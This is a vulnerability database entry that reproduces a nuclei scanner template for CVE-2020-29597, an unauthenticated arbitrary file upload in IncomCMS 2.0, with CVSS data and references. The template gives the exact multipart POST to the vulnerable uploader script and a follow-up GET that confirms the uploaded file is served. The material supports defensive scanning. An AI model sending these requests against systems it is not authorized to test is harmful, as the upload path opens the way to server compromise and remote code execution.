Lucene search
K

IncomCMS 2.0 - Arbitrary File Upload

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

IncomCMS 2.0 insecure file upload allows unauthenticated attackers to upload files, leading to unauthorized access, data leakage, and potential remote code execution. Apply security patch or update to fix CVE-2020-29597

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-29597
7 Dec 202022:30
circl
CNNVD
Incomcms 代码问题漏洞
7 Dec 202000:00
cnnvd
CNVD
IncomCMS File Upload Vulnerability
9 Dec 202000:00
cnvd
CVE
CVE-2020-29597
7 Dec 202019:09
cve
Cvelist
CVE-2020-29597
7 Dec 202019:09
cvelist
Exploit DB
IncomCMS 2.0 - Insecure File Upload
5 Jan 202100:00
exploitdb
NVD
CVE-2020-29597
7 Dec 202020:15
nvd
Packet Storm
Incom CMS 2.0 File Upload
5 Jan 202100:00
packetstorm
Prion
Design/Logic Flaw
7 Dec 202020:15
prion
RedhatCVE
CVE-2020-29597
22 May 202517:02
redhatcve
Rows per page
id: CVE-2020-29597

info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patch or update to a version that addresses the vulnerability.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
    - https://github.com/trhacknon/CVE-2020-29597
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.71666
    epss-percentile: 0.99343
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project,vkev,vuln

http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt

        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html

        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'

      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'
# digest: 4b0a00483046022100db2072fc9cb0b4f97c9d66fee633165cb98a61b4ef5471511fa5de566686194a022100bafbac5a16ce7b65cd77edfb4201cf895e7479e85c8c522563c28601f380a823:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.71666
34